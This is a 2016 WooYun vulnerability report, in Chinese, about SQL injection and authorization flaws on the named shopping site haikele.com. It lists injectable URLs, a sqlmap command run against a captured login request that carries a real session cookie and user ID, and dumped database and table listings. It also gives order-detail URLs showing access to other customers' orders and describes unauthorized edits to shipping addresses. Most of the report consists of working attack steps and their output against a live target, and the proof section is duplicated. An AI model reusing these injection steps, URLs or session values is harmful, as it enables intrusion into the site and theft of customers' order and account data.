海客乐多处SQL注入800多个表可垮裤查询&两处越权

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0196245

漏洞标题：海客乐多处SQL注入800多个表可垮裤查询&两处越权

漏洞作者：黑色键盘丶

提交时间：2016-04-14 16:11

修复时间：2016-05-29 16:20

公开时间：2016-05-29 16:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-14：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-29：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://www.haikele.com/yssfclist.aspx?Type=A
http://www.haikele.com/yssfclist.aspx?Taste=A
http://www.haikele.com/sfcwzlb.aspx?CategoryID=U 
post注入语法：sqlmap.py -r 3.txt --dbs
--------------------post数据包----------------------
POST /Login/CustomerLogin.aspx HTTP/1.1
Host: www.haikele.com
Proxy-Connection: keep-alive
Content-Length: 138
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.haikele.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.haikele.com/Login/CustomerLogin.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=wehacuifp1bllptitzriqhg2; LXB_REFER=www.baidu.com; tencentSig=8241218560; HAIKELELOGIN=UserName=13656785601&UserId=214252&AvatarFile=; ProductCookie=sysNos=48013,48013,39196,39196; _gat=1; EntLibCartCookie=cart=00A8BA1CC67CA331; EntLibGiftCookie=gift=00A8BA1CC67CA331; Hm_lvt_bbb3472a2e37b94736cc95fc663ca69f=1460574967; Hm_lpvt_bbb3472a2e37b94736cc95fc663ca69f=1460581837; _ga=GA1.2.1670466567.1460574967
__VIEWSTATE=%2FwEPDwUJNDc2NzE5NzM3ZGQ%3D&ctl00%24Body%24txtUid=wooyun&ctl00%24Body%24txtPwd=123123&ctl00%24Body%24btnLogin=%B5%C7+++%C2%BC

数据库信息

available databases [9]:
[*] back
[*] bak20141212
[*] EntLibShopping
[*] master
[*] model
[*] msdb
[*] t
[*] tempdb
[*] TMDB

表信息

Database: EntLibShopping
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.INVT_INVT_WBA                  | 1062297 |
| dbo.Ent_Sys_Log                    | 303966  |
| dbo.zvw_report_traceqtydetail      | 219857  |
| dbo.Ent_Customer_Sequence          | 214252  |
| dbo.PACK_CARD_ORDER_ITEM           | 197411  |
| dbo.PACK_CARD_ORDER_ITEM           | 197411  |
| dbo.zvw_report_posqtydetail        | 173719  |
| dbo.Ent_Hi_Log                     | 139023  |
| dbo.zvw_report_orderqtydetail      | 128295  |
| dbo.Ent_SO_Item_Backup             | 122000  |
| dbo.Ent_SO_Item_Backup             | 122000  |
| dbo.vw_report_shortage_detail      | 118369  |
| dbo.ztb_deliverycert_list          | 116768  |
| dbo.vw_report_saleexcept_detail    | 103239  |
| dbo.Ent_SignIn_Hi                  | 95681   |
| dbo.Ent_Search_Keywords            | 91203   |
| dbo.PACK_PRODUCT_SUPPLY            | 48064   |
| dbo.Ent_Product_Sequence           | 44794   |
| dbo.Ent_integral_log               | 31824   |
| dbo.Ent_integral_log               | 31824   |
| dbo.PACK_TEMPLATE_PLAN_ITEM        | 30876   |
| dbo.vw_report_lockexcept_detail_v2 | 29744   |
| dbo.vw_report_lockexcept_detail_v2 | 29744   |
| dbo.PACK_CARD_ORDER_MASTER         | 25670   |
| dbo.Ent_Comment                    | 23669   |
| dbo.Ent_SO_Master_Backup           | 22739   |
| dbo.Ent_SO_Master_Backup           | 22739   |
| dbo.Ent_AccountRecharge            | 20320   |
| dbo.View_Customer_List             | 19482   |
| dbo.Review                         | 12439   |
| dbo.View_ztb_deliverycert_detail   | 12125   |
| dbo.Ent_ShipAddress                | 10974   |
| dbo.Ent_Product_Pics               | 10064   |
| dbo.View_Comment_List              | 9885    |
| dbo.Ent_Product_Price              | 9403    |
| dbo.Ent_VendorLog                  | 8396    |
| dbo.Ent_Product_TempQuantity       | 5961    |
| dbo.vw_report_zongzi_order_detail  | 4126    |
| dbo.Ent_SO_Master_Repeat           | 3533    |
| dbo.Ent_Inventory_Stock            | 3492    |
| dbo.Ent_Inventory_Stock            | 3492    |
| dbo.Ent_Product_Status             | 3381    |
| dbo.Ent_Area_Sequence              | 3364    |
| dbo.Ent_Area_Sequence              | 3364    |
| dbo.PACK_TEMPLATE_PLAN_MASTER      | 3216    |
| dbo.Ent_Manufacturer_Sequence      | 2468    |
| dbo.Ent_Manufacturer_Sequence      | 2468    |
| dbo.Ent_CMS_Blog                   | 2340    |
| dbo.Ent_ShipType_Area_Un           | 2269    |
| dbo.Ent_PhoneUP                    | 2202    |
| dbo.Ent_Recharge_log               | 2195    |
| dbo.PACK_CARD_RULE                 | 1865    |
| dbo.Ent_SO_Sequence                | 1708    |
| dbo.Ent_YiYuanGou                  | 1646    |
| dbo.T_District                     | 949     |
| dbo.View_ProductList               | 828     |
| dbo.PACK_PRODUCT_CLASS             | 614     |
| dbo.Ent_Sys_Role_Privilege         | 605     |
| dbo.Ent_Sys_Role_Privilege         | 605     |
| dbo.Ent_PO_Item                    | 524     |
| dbo.Ent_Sys_Sequence               | 473     |
| dbo.[Ent_CMS_Menu-bad]             | 455     |
| dbo.[Ent_CMS_Menu-bad]             | 455     |
| dbo.Ent_Product_DailyClickTrend    | 441     |
| dbo.Ent_Product_SaleTrend          | 437     |
| dbo.Ent_Promotion_Rule             | 435     |
| dbo.Ent_Product_LastPOInfo         | 391     |
| dbo.vw_report_abortexcept_detail   | 387     |
| dbo.View_AccountRecharge_detail    | 352     |
| dbo.Ent_SO_ValueAdded_Invoice      | 337     |
| dbo.ztb_deliverycert_type          | 293     |
| dbo.Ent_Finance_SOIncome           | 265     |
| dbo.Ent_Sys_User_Role              | 235     |
| dbo.T_City                         | 195     |
| dbo.Ent_Sys_Privilege              | 175     |
| dbo.Ent_Category_Sequence          | 166     |
| dbo.Ent_Product_Remark             | 159     |
| dbo.Ent_ProductCategory            | 121     |
| dbo.Ent_Category2                  | 120     |
| dbo.Ent_Sale_PointDelay            | 107     |
| dbo.Ent_Customer_PointLog          | 98      |
| dbo.Ent_Customer_PointLog          | 98      |
| dbo.view_ProductCategory_list      | 90      |
| dbo.view_ProductCategory_list      | 90      |
| dbo.View_ProductCategoryList       | 90      |
| dbo.Ent_AsyncEmail                 | 86      |
| dbo.Ent_Category_Customized        | 79      |
| dbo.Ent_PO_Sequence                | 75      |
| dbo.Ent_PO_Master                  | 74      |
| dbo.Ent_ShipType_Area_Price        | 68      |
| dbo.Ent_ShipType_Area_Price        | 68      |
| dbo.Seo_head                       | 61      |
| dbo.Ent_Category_Attribute         | 60      |
| dbo.Ent_SaleAdvertisementItem      | 58      |
| dbo.Ent_SaleAdvertisementItem      | 58      |
| dbo.Ent_SendPromotion_Log          | 56      |
| dbo.Ent_Product_DailyClick         | 52      |
| dbo.Ent_SearchKeyword              | 43      |
| dbo.PACK_PACK_CLASS                | 40      |
| dbo.PACK_PACK_CLASS                | 40      |
| dbo.Ent_St_Adjust_Item             | 30      |
| dbo.Ent_St_Adjust_Item             | 30      |
| dbo.T_Province                     | 29      |
| dbo.ztb_deliverycert_Exchange      | 28      |
| dbo.Ent_SaleRule_Item              | 26      |
| dbo.Ent_Category1                  | 25      |
| dbo.Ent_ShipType_Sequence          | 25      |
| dbo.Ent_St_Adjust_Sequence         | 25      |
| dbo.Ent_TaoBao                     | 25      |
| dbo.Ent_PayType_Sequence           | 22      |
| dbo.Ent_PayType_Sequence           | 22      |
| dbo.Ent_Package_Offers             | 17      |
| dbo.Ent_PO_Apportion_Subject       | 17      |
| dbo.Ent_Vendor_Sequence            | 16      |
| dbo.Ent_Vendor_Sequence            | 16      |
| dbo.Ent_News                       | 11      |
| dbo.Ent_Poll_Item                  | 11      |
| dbo.Ent_Poll_Item                  | 11      |
| dbo.Ent_SaleRule_Master            | 11      |
| dbo.Ent_St_Virtual                 | 11      |
| dbo.Ent_Promotion_Code_Sequence    | 10      |
| dbo.Ent_Promotion_Code_Sequence    | 10      |
| dbo.zvw_deliverystore_list         | 10      |
| dbo.Ent_Stock_Join                 | 9       |
| dbo.Ent_Stock_Join                 | 9       |
| dbo.Ent_OnlineListArea             | 8       |
| dbo.Ent_OnlineListArea             | 8       |
| dbo.Ent_ShipType_PayType_Un        | 8       |
| dbo.Ent_Sys_User_FavoriteLink      | 8       |
| dbo.Ent_Sys_User_FavoriteLink      | 8       |
| dbo.Ent_Finance_POPay_Item         | 7       |
| dbo.Ent_Finance_POPay_Item         | 7       |
| dbo.Ent_St_Transfer_Item           | 7       |
| dbo.Ent_St_Transfer_Item           | 7       |
| dbo.Ent_Supplie                    | 7       |
| dbo.Ent_Product_Question           | 6       |
| dbo.Ent_St_Transfer_Sequence       | 5       |
| dbo.Ent_WishList                   | 5       |
| dbo.Ent_Cs_log                     | 4       |
| dbo.Ent_Cs_log                     | 4       |
| dbo.Ent_PO_Basket                  | 4       |
| dbo.Ent_Product_Related            | 4       |
| dbo.Ent_Product_Sale               | 4       |
| dbo.Ent_Sys_Sync                   | 4       |
| dbo.T_Type                         | 4       |
| dbo.ztb_deliverycert_status        | 4       |
| dbo.Ent_Product_Notify             | 3       |
| dbo.Ent_RMA_OutBound_Item          | 3       |
| dbo.Ent_RMA_OutBound_Item          | 3       |
| dbo.Ent_RMA_Register_Sequence      | 3       |
| dbo.Ent_RMA_Register_Sequence      | 3       |
| dbo.Ent_RMA_Request_Item           | 3       |
| dbo.Ent_RMA_Request_Item           | 3       |
| dbo.Ent_RMA_Request_Sequence       | 3       |
| dbo.Ent_Feedback                   | 2       |
| dbo.Ent_Finance_NetPay             | 2       |
| dbo.Ent_RMA_OutBound_Sequence      | 2       |
| dbo.Ent_RMA_Revert_Item            | 2       |
| dbo.Ent_RMA_Revert_Item            | 2       |
| dbo.Ent_RMA_Revert_Sequence        | 2       |
| dbo.Ent_Settings                   | 2       |
| dbo.Ent_St_Lend_Item               | 2       |
| dbo.Ent_St_Lend_Item               | 2       |
| dbo.Ent_St_Lend_Return             | 2       |
| dbo.Ent_Sys_Configuration          | 2       |
| dbo.UserPointLevel                 | 2       |
| dbo.Ent_FriendLink                 | 1       |
| dbo.Ent_LinkSource_ReportColumn    | 1       |
| dbo.Ent_LinkSource_ReportColumn    | 1       |
| dbo.Ent_Promotion_Customer         | 1       |
| dbo.Ent_Promotion_Limit            | 1       |
| dbo.Ent_Promotion_Master_Sequence  | 1       |
| dbo.Ent_Promotion_Master_Sequence  | 1       |
| dbo.Ent_Recommend                  | 1       |
| dbo.Ent_RMA_Refund_Item            | 1       |
| dbo.Ent_RMA_Refund_Item            | 1       |
| dbo.Ent_RMA_Refund_Sequence        | 1       |
| dbo.Ent_RMA_Return_Item            | 1       |
| dbo.Ent_RMA_Return_Item            | 1       |
| dbo.Ent_RMA_Return_Sequence        | 1       |
| dbo.Ent_Sale_CountDown             | 1       |
| dbo.Ent_Sale_CountGift             | 1       |
| dbo.Ent_St_Lend_Sequence           | 1       |
| dbo.Ent_St_Shift_Item              | 1       |
| dbo.Ent_St_Shift_Item              | 1       |
| dbo.Ent_St_Shift_Sequence          | 1       |
| dbo.PACK_CARD_SEASON               | 1       |
+------------------------------------+---------+

下面800多个表贴出部分信息

Database: TMDB
[807 tables]
+---------------------------------------------+
| ACTIONSERIES                                |
| AP_PAYMENT_APPLY                            |
| ARHASTENENTERTAIN                           |
| AR_AR_GA_tmp                                |
| AR_AR_GA_tmp                                |
| AR_AR_WBA_tmp                               |
| AR_AR_WBA_tmp                               |
| AR_FAR_GA                                   |
| AR_FAR_WBA                                  |
| AR_RACCT_GA                                 |
| AR_RACCT_WBA                                |
| AR_yingshou_v                               |
| AccountsPopedom                             |
| Aux_IMEICODE                                |
| BATCH_FORM_BD                               |
| BATCH_FORM_HD                               |
| BBS1                                        |
| BILLCONTENTCONFIGURE                        |
| BILLCONTENTRECORD                           |
| BILLCONTENTTABLE                            |
| BILLCONTENTTABLEST                          |
| BOXST                                       |
| BOXUPHEAD                                   |
| BOXUPST                                     |
| BPMCONTENT                                  |
| BPMFLOW                                     |
| BPMMAIN                                     |
| BSC_EVAL_BD                                 |
| BSC_EVAL_HD                                 |
| BSC_INI                                     |
| BranchPost                                  |
| CAIGOU1                                     |
| CB_ACTIONATTRIBUTE                          |
| CB_ACTIONBUSINESS                           |
| CB_ACTIONSERIES2                            |
| CB_ACTIONSERIES2                            |
| CB_ACTIONSERIESDOING                        |
| CB_ACTIONSERIESLAST                         |
| CB_ACTIONSERIESLOG                          |
| CB_BILLCONFIGUREBD                          |
| CB_BILLCONFIGUREHD                          |
| CB_COMTB                                    |
| CB_PLANTB                                   |
| CB_SERVICECHECK                             |
| CB_zBak_20100326_161840_201004_AR_AR_GA     |
| CB_zBak_20100326_161840_201004_Invt_Invt_GA |
| COMPREVDATE                                 |
| COMTB                                       |
| CX_RYKC                                     |
| C_ACCOUNTSPOPEDOM                           |
| C_ACCOUNTS_PERMISSIONS                      |
| C_ACCOUNTS_ROLEPERMISSIONS                  |
| C_AUDITCFG                                  |
| C_BDTOHD                                    |
| C_BFACCTCFG                                 |
| C_BILLRULESERIES                            |
| C_BUTTONCFG                                 |
| C_CHOOSEBILL                                |
| C_COMBOCFG                                  |
| C_COMBOUION                                 |
| C_COMMONCXFORM                              |
| C_COMMONCXFORM                              |
| C_COMMONPRINTCLICK                          |
| C_COMMONPRINTCLICK                          |
| C_COMMONPRINTFSET                           |
| C_COMMONPRINTFSETUSER                       |
| C_COMMONPRINTMULTITEMPLATE                  |
| C_COMMONPRINTSET                            |
| C_COMMONPRINTSET                            |
| C_COMMONRS                                  |

这边越权查看任意订单信息

http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34996

http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34995

还有一处是收货信息任意改
修改处抓包

这个

之前177这个号

修改包

成功添加一个

漏洞证明：

http://www.haikele.com/yssfclist.aspx?Type=A
http://www.haikele.com/yssfclist.aspx?Taste=A
http://www.haikele.com/sfcwzlb.aspx?CategoryID=U 
post注入语法：sqlmap.py -r 3.txt --dbs
--------------------post数据包----------------------
POST /Login/CustomerLogin.aspx HTTP/1.1
Host: www.haikele.com
Proxy-Connection: keep-alive
Content-Length: 138
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.haikele.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.haikele.com/Login/CustomerLogin.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=wehacuifp1bllptitzriqhg2; LXB_REFER=www.baidu.com; tencentSig=8241218560; HAIKELELOGIN=UserName=13656785601&UserId=214252&AvatarFile=; ProductCookie=sysNos=48013,48013,39196,39196; _gat=1; EntLibCartCookie=cart=00A8BA1CC67CA331; EntLibGiftCookie=gift=00A8BA1CC67CA331; Hm_lvt_bbb3472a2e37b94736cc95fc663ca69f=1460574967; Hm_lpvt_bbb3472a2e37b94736cc95fc663ca69f=1460581837; _ga=GA1.2.1670466567.1460574967
__VIEWSTATE=%2FwEPDwUJNDc2NzE5NzM3ZGQ%3D&ctl00%24Body%24txtUid=wooyun&ctl00%24Body%24txtPwd=123123&ctl00%24Body%24btnLogin=%B5%C7+++%C2%BC

数据库信息

available databases [9]:
[*] back
[*] bak20141212
[*] EntLibShopping
[*] master
[*] model
[*] msdb
[*] t
[*] tempdb
[*] TMDB

表信息

Database: EntLibShopping
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.INVT_INVT_WBA                  | 1062297 |
| dbo.Ent_Sys_Log                    | 303966  |
| dbo.zvw_report_traceqtydetail      | 219857  |
| dbo.Ent_Customer_Sequence          | 214252  |
| dbo.PACK_CARD_ORDER_ITEM           | 197411  |
| dbo.PACK_CARD_ORDER_ITEM           | 197411  |
| dbo.zvw_report_posqtydetail        | 173719  |
| dbo.Ent_Hi_Log                     | 139023  |
| dbo.zvw_report_orderqtydetail      | 128295  |
| dbo.Ent_SO_Item_Backup             | 122000  |
| dbo.Ent_SO_Item_Backup             | 122000  |
| dbo.vw_report_shortage_detail      | 118369  |
| dbo.ztb_deliverycert_list          | 116768  |
| dbo.vw_report_saleexcept_detail    | 103239  |
| dbo.Ent_SignIn_Hi                  | 95681   |
| dbo.Ent_Search_Keywords            | 91203   |
| dbo.PACK_PRODUCT_SUPPLY            | 48064   |
| dbo.Ent_Product_Sequence           | 44794   |
| dbo.Ent_integral_log               | 31824   |
| dbo.Ent_integral_log               | 31824   |
| dbo.PACK_TEMPLATE_PLAN_ITEM        | 30876   |
| dbo.vw_report_lockexcept_detail_v2 | 29744   |
| dbo.vw_report_lockexcept_detail_v2 | 29744   |
| dbo.PACK_CARD_ORDER_MASTER         | 25670   |
| dbo.Ent_Comment                    | 23669   |
| dbo.Ent_SO_Master_Backup           | 22739   |
| dbo.Ent_SO_Master_Backup           | 22739   |
| dbo.Ent_AccountRecharge            | 20320   |
| dbo.View_Customer_List             | 19482   |
| dbo.Review                         | 12439   |
| dbo.View_ztb_deliverycert_detail   | 12125   |
| dbo.Ent_ShipAddress                | 10974   |
| dbo.Ent_Product_Pics               | 10064   |
| dbo.View_Comment_List              | 9885    |
| dbo.Ent_Product_Price              | 9403    |
| dbo.Ent_VendorLog                  | 8396    |
| dbo.Ent_Product_TempQuantity       | 5961    |
| dbo.vw_report_zongzi_order_detail  | 4126    |
| dbo.Ent_SO_Master_Repeat           | 3533    |
| dbo.Ent_Inventory_Stock            | 3492    |
| dbo.Ent_Inventory_Stock            | 3492    |
| dbo.Ent_Product_Status             | 3381    |
| dbo.Ent_Area_Sequence              | 3364    |
| dbo.Ent_Area_Sequence              | 3364    |
| dbo.PACK_TEMPLATE_PLAN_MASTER      | 3216    |
| dbo.Ent_Manufacturer_Sequence      | 2468    |
| dbo.Ent_Manufacturer_Sequence      | 2468    |
| dbo.Ent_CMS_Blog                   | 2340    |
| dbo.Ent_ShipType_Area_Un           | 2269    |
| dbo.Ent_PhoneUP                    | 2202    |
| dbo.Ent_Recharge_log               | 2195    |
| dbo.PACK_CARD_RULE                 | 1865    |
| dbo.Ent_SO_Sequence                | 1708    |
| dbo.Ent_YiYuanGou                  | 1646    |
| dbo.T_District                     | 949     |
| dbo.View_ProductList               | 828     |
| dbo.PACK_PRODUCT_CLASS             | 614     |
| dbo.Ent_Sys_Role_Privilege         | 605     |
| dbo.Ent_Sys_Role_Privilege         | 605     |
| dbo.Ent_PO_Item                    | 524     |
| dbo.Ent_Sys_Sequence               | 473     |
| dbo.[Ent_CMS_Menu-bad]             | 455     |
| dbo.[Ent_CMS_Menu-bad]             | 455     |
| dbo.Ent_Product_DailyClickTrend    | 441     |
| dbo.Ent_Product_SaleTrend          | 437     |
| dbo.Ent_Promotion_Rule             | 435     |
| dbo.Ent_Product_LastPOInfo         | 391     |
| dbo.vw_report_abortexcept_detail   | 387     |
| dbo.View_AccountRecharge_detail    | 352     |
| dbo.Ent_SO_ValueAdded_Invoice      | 337     |
| dbo.ztb_deliverycert_type          | 293     |
| dbo.Ent_Finance_SOIncome           | 265     |
| dbo.Ent_Sys_User_Role              | 235     |
| dbo.T_City                         | 195     |
| dbo.Ent_Sys_Privilege              | 175     |
| dbo.Ent_Category_Sequence          | 166     |
| dbo.Ent_Product_Remark             | 159     |
| dbo.Ent_ProductCategory            | 121     |
| dbo.Ent_Category2                  | 120     |
| dbo.Ent_Sale_PointDelay            | 107     |
| dbo.Ent_Customer_PointLog          | 98      |
| dbo.Ent_Customer_PointLog          | 98      |
| dbo.view_ProductCategory_list      | 90      |
| dbo.view_ProductCategory_list      | 90      |
| dbo.View_ProductCategoryList       | 90      |
| dbo.Ent_AsyncEmail                 | 86      |
| dbo.Ent_Category_Customized        | 79      |
| dbo.Ent_PO_Sequence                | 75      |
| dbo.Ent_PO_Master                  | 74      |
| dbo.Ent_ShipType_Area_Price        | 68      |
| dbo.Ent_ShipType_Area_Price        | 68      |
| dbo.Seo_head                       | 61      |
| dbo.Ent_Category_Attribute         | 60      |
| dbo.Ent_SaleAdvertisementItem      | 58      |
| dbo.Ent_SaleAdvertisementItem      | 58      |
| dbo.Ent_SendPromotion_Log          | 56      |
| dbo.Ent_Product_DailyClick         | 52      |
| dbo.Ent_SearchKeyword              | 43      |
| dbo.PACK_PACK_CLASS                | 40      |
| dbo.PACK_PACK_CLASS                | 40      |
| dbo.Ent_St_Adjust_Item             | 30      |
| dbo.Ent_St_Adjust_Item             | 30      |
| dbo.T_Province                     | 29      |
| dbo.ztb_deliverycert_Exchange      | 28      |
| dbo.Ent_SaleRule_Item              | 26      |
| dbo.Ent_Category1                  | 25      |
| dbo.Ent_ShipType_Sequence          | 25      |
| dbo.Ent_St_Adjust_Sequence         | 25      |
| dbo.Ent_TaoBao                     | 25      |
| dbo.Ent_PayType_Sequence           | 22      |
| dbo.Ent_PayType_Sequence           | 22      |
| dbo.Ent_Package_Offers             | 17      |
| dbo.Ent_PO_Apportion_Subject       | 17      |
| dbo.Ent_Vendor_Sequence            | 16      |
| dbo.Ent_Vendor_Sequence            | 16      |
| dbo.Ent_News                       | 11      |
| dbo.Ent_Poll_Item                  | 11      |
| dbo.Ent_Poll_Item                  | 11      |
| dbo.Ent_SaleRule_Master            | 11      |
| dbo.Ent_St_Virtual                 | 11      |
| dbo.Ent_Promotion_Code_Sequence    | 10      |
| dbo.Ent_Promotion_Code_Sequence    | 10      |
| dbo.zvw_deliverystore_list         | 10      |
| dbo.Ent_Stock_Join                 | 9       |
| dbo.Ent_Stock_Join                 | 9       |
| dbo.Ent_OnlineListArea             | 8       |
| dbo.Ent_OnlineListArea             | 8       |
| dbo.Ent_ShipType_PayType_Un        | 8       |
| dbo.Ent_Sys_User_FavoriteLink      | 8       |
| dbo.Ent_Sys_User_FavoriteLink      | 8       |
| dbo.Ent_Finance_POPay_Item         | 7       |
| dbo.Ent_Finance_POPay_Item         | 7       |
| dbo.Ent_St_Transfer_Item           | 7       |
| dbo.Ent_St_Transfer_Item           | 7       |
| dbo.Ent_Supplie                    | 7       |
| dbo.Ent_Product_Question           | 6       |
| dbo.Ent_St_Transfer_Sequence       | 5       |
| dbo.Ent_WishList                   | 5       |
| dbo.Ent_Cs_log                     | 4       |
| dbo.Ent_Cs_log                     | 4       |
| dbo.Ent_PO_Basket                  | 4       |
| dbo.Ent_Product_Related            | 4       |
| dbo.Ent_Product_Sale               | 4       |
| dbo.Ent_Sys_Sync                   | 4       |
| dbo.T_Type                         | 4       |
| dbo.ztb_deliverycert_status        | 4       |
| dbo.Ent_Product_Notify             | 3       |
| dbo.Ent_RMA_OutBound_Item          | 3       |
| dbo.Ent_RMA_OutBound_Item          | 3       |
| dbo.Ent_RMA_Register_Sequence      | 3       |
| dbo.Ent_RMA_Register_Sequence      | 3       |
| dbo.Ent_RMA_Request_Item           | 3       |
| dbo.Ent_RMA_Request_Item           | 3       |
| dbo.Ent_RMA_Request_Sequence       | 3       |
| dbo.Ent_Feedback                   | 2       |
| dbo.Ent_Finance_NetPay             | 2       |
| dbo.Ent_RMA_OutBound_Sequence      | 2       |
| dbo.Ent_RMA_Revert_Item            | 2       |
| dbo.Ent_RMA_Revert_Item            | 2       |
| dbo.Ent_RMA_Revert_Sequence        | 2       |
| dbo.Ent_Settings                   | 2       |
| dbo.Ent_St_Lend_Item               | 2       |
| dbo.Ent_St_Lend_Item               | 2       |
| dbo.Ent_St_Lend_Return             | 2       |
| dbo.Ent_Sys_Configuration          | 2       |
| dbo.UserPointLevel                 | 2       |
| dbo.Ent_FriendLink                 | 1       |
| dbo.Ent_LinkSource_ReportColumn    | 1       |
| dbo.Ent_LinkSource_ReportColumn    | 1       |
| dbo.Ent_Promotion_Customer         | 1       |
| dbo.Ent_Promotion_Limit            | 1       |
| dbo.Ent_Promotion_Master_Sequence  | 1       |
| dbo.Ent_Promotion_Master_Sequence  | 1       |
| dbo.Ent_Recommend                  | 1       |
| dbo.Ent_RMA_Refund_Item            | 1       |
| dbo.Ent_RMA_Refund_Item            | 1       |
| dbo.Ent_RMA_Refund_Sequence        | 1       |
| dbo.Ent_RMA_Return_Item            | 1       |
| dbo.Ent_RMA_Return_Item            | 1       |
| dbo.Ent_RMA_Return_Sequence        | 1       |
| dbo.Ent_Sale_CountDown             | 1       |
| dbo.Ent_Sale_CountGift             | 1       |
| dbo.Ent_St_Lend_Sequence           | 1       |
| dbo.Ent_St_Shift_Item              | 1       |
| dbo.Ent_St_Shift_Item              | 1       |
| dbo.Ent_St_Shift_Sequence          | 1       |
| dbo.PACK_CARD_SEASON               | 1       |
+------------------------------------+---------+

下面800多个表贴出部分信息

Database: TMDB
[807 tables]
+---------------------------------------------+
| ACTIONSERIES                                |
| AP_PAYMENT_APPLY                            |
| ARHASTENENTERTAIN                           |
| AR_AR_GA_tmp                                |
| AR_AR_GA_tmp                                |
| AR_AR_WBA_tmp                               |
| AR_AR_WBA_tmp                               |
| AR_FAR_GA                                   |
| AR_FAR_WBA                                  |
| AR_RACCT_GA                                 |
| AR_RACCT_WBA                                |
| AR_yingshou_v                               |
| AccountsPopedom                             |
| Aux_IMEICODE                                |
| BATCH_FORM_BD                               |
| BATCH_FORM_HD                               |
| BBS1                                        |
| BILLCONTENTCONFIGURE                        |
| BILLCONTENTRECORD                           |
| BILLCONTENTTABLE                            |
| BILLCONTENTTABLEST                          |
| BOXST                                       |
| BOXUPHEAD                                   |
| BOXUPST                                     |
| BPMCONTENT                                  |
| BPMFLOW                                     |
| BPMMAIN                                     |
| BSC_EVAL_BD                                 |
| BSC_EVAL_HD                                 |
| BSC_INI                                     |
| BranchPost                                  |
| CAIGOU1                                     |
| CB_ACTIONATTRIBUTE                          |
| CB_ACTIONBUSINESS                           |
| CB_ACTIONSERIES2                            |
| CB_ACTIONSERIES2                            |
| CB_ACTIONSERIESDOING                        |
| CB_ACTIONSERIESLAST                         |
| CB_ACTIONSERIESLOG                          |
| CB_BILLCONFIGUREBD                          |
| CB_BILLCONFIGUREHD                          |
| CB_COMTB                                    |
| CB_PLANTB                                   |
| CB_SERVICECHECK                             |
| CB_zBak_20100326_161840_201004_AR_AR_GA     |
| CB_zBak_20100326_161840_201004_Invt_Invt_GA |
| COMPREVDATE                                 |
| COMTB                                       |
| CX_RYKC                                     |
| C_ACCOUNTSPOPEDOM                           |
| C_ACCOUNTS_PERMISSIONS                      |
| C_ACCOUNTS_ROLEPERMISSIONS                  |
| C_AUDITCFG                                  |
| C_BDTOHD                                    |
| C_BFACCTCFG                                 |
| C_BILLRULESERIES                            |
| C_BUTTONCFG                                 |
| C_CHOOSEBILL                                |
| C_COMBOCFG                                  |
| C_COMBOUION                                 |
| C_COMMONCXFORM                              |
| C_COMMONCXFORM                              |
| C_COMMONPRINTCLICK                          |
| C_COMMONPRINTCLICK                          |
| C_COMMONPRINTFSET                           |
| C_COMMONPRINTFSETUSER                       |
| C_COMMONPRINTMULTITEMPLATE                  |
| C_COMMONPRINTSET                            |
| C_COMMONPRINTSET                            |
| C_COMMONRS                                  |

这边越权查看任意订单信息

http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34996

http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34995

还有一处是收货信息任意改
修改处抓包

这个

之前177这个号

修改包

成功添加一个

修复方案：

过滤加验证你懂得

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0196245

漏洞标题：海客乐多处SQL注入800多个表可垮裤查询&两处越权

相关厂商：海客乐

漏洞作者：黑色键盘丶

提交时间：2016-04-14 16:11

修复时间：2016-05-29 16:20

公开时间：2016-05-29 16:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0196245

漏洞标题：海客乐多处SQL注入800多个表可垮裤查询&两处越权

相关厂商：海客乐

漏洞作者： 黑色键盘丶

提交时间：2016-04-14 16:11

修复时间：2016-05-29 16:20

公开时间：2016-05-29 16:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0196245"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

